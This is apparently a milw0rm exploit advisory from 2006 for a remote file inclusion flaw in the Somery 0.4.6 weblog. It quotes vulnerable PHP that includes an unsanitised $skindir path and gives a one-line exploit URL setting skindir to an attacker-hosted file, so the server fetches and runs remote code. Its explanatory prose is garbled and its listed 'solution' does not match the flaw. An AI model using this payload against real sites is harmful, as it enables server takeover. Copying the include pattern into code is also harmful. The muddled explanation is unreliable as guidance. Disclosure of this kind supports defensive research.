Update: 16:01 09/08/06 Subject: "Somery 0.4(skin_dir)Remote File Inclusion Exploit" Vulnerable version: Somery 0.4.6 Operating System: - All OS Vendor URL: Robin de Graaf - voh@hostvoh.net Somery website - http://somery.danwa.net Description: Somery, also known as the Somery weblogging system. Vulnerability: An error accoured when sending a specified string code at include function Varibale scope at the line for request was not except how they handle failure.include() does not behave this way, the script will continue regardless.include() produces a Warning while require() results in a Fatal Error. see vulnerability script; // upload/admin/system/include.php if ($start) { include("../config.php"); include("cookies.php"); include("system/error.php"); include("system/functions.php"); include("system/authorization.php"); include("$skindir/header.php"); // is invalid code } else { if (!$checkauth) { $login = TRUE; include("login.php"); } include("$skindir/footer.php"); // is invalid code } Exploit: // =============XCRIME-CYBER============ // Somery 0.4(skin_dir)Remote File Inclusion Exploit // ====================================== // basher13 - Infam0us Gr0up Usage: http://[domain]/[path]/upload/admin/system/include.php?skindir=http://[url_inclusion_exploit] Solution: PHP Manual(PHP 3, PHP 4, PHP 5) Defined -- Checks whether a given named constant exists Published by: basher13 (Infam0us Gr0up - Securiti Research) basher13@linuxmail.org / www.xcrime-cyber.pro.tc # milw0rm.com [2006-09-08]